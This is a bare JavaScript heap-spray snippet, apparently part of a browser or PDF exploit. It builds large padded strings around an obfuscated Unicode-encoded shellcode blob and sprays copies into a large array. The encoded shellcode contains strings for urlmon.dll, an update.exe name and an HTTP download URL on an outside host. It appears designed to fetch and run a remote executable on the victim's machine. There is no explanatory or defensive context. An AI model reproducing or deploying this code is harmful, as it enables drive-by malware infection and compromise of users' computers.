var padding = String.fromCharCode(37008) + String.fromCharCode(37008)
var html =
  padding +
  '䛫ㅟ菉ǩﺉ쀰Ĭ껲䟾觿\u30FBⳀ\uF201ﺮｇﶉ껲䟾\uEBFF恱줱譤ぱ皋謌ᱶ庋謈\u2056㚋㥦ᡊ\uF275岉ᰤ썡寫譠\u246C謤㱅咋砅\uEA01䪋謘\u205A\uEB01㓣證謴\uEE01Ｑ쀱과삄ݴ쿁Ē\uEBC7㯴\u247C用诡\u245A\uEB01警䬌媋Ĝ诫謄\uE801䒉ᰤ썡哫툱剒啓ｒ\uEBD0\uEB1A\uE85Dｻ\uFFFF\uE7BA论勄\uE850ﾒ\uFFFF툱ｒ\uEBD0\uE82D\uFF63\uFFFFꪺ詮勳\uE850ｺ\uFFFF툱슃菿\uFAEA卒탿짫䞺졽加\uE850\uFF60\uFFFF껫巫㓨\uFFFF뫿츒च偒䯨\uFFFF囿탿\uDAEB裡\uFFFE痿汲潭\u2E6E汤ｬ\u2E2E甯摰瑡\u2E65硥\uFF65瑨灴\u2F3A戯畬灲獩瑩\u2E65楳整〹挮浯\u2F2F潤湷潬摡晟汩\u2E65桰㽰㵥摁扯ⵥ〲〱\u322D㠸Ｔύ'
while (padding.length < 65564) {
  padding += padding
}
var value = padding.substring(0, 1524)
value += html
value += padding
var destination = value.substring(0, 32768)
while (1) {
  destination += destination
  if (destination.length >= 524288) {
    break
  }
}
var today = destination.substring(0, 522228)
var forever = new Array()
for (var infinite = 0; infinite < 496; infinite++) {
  forever[infinite] = today + 's'
}
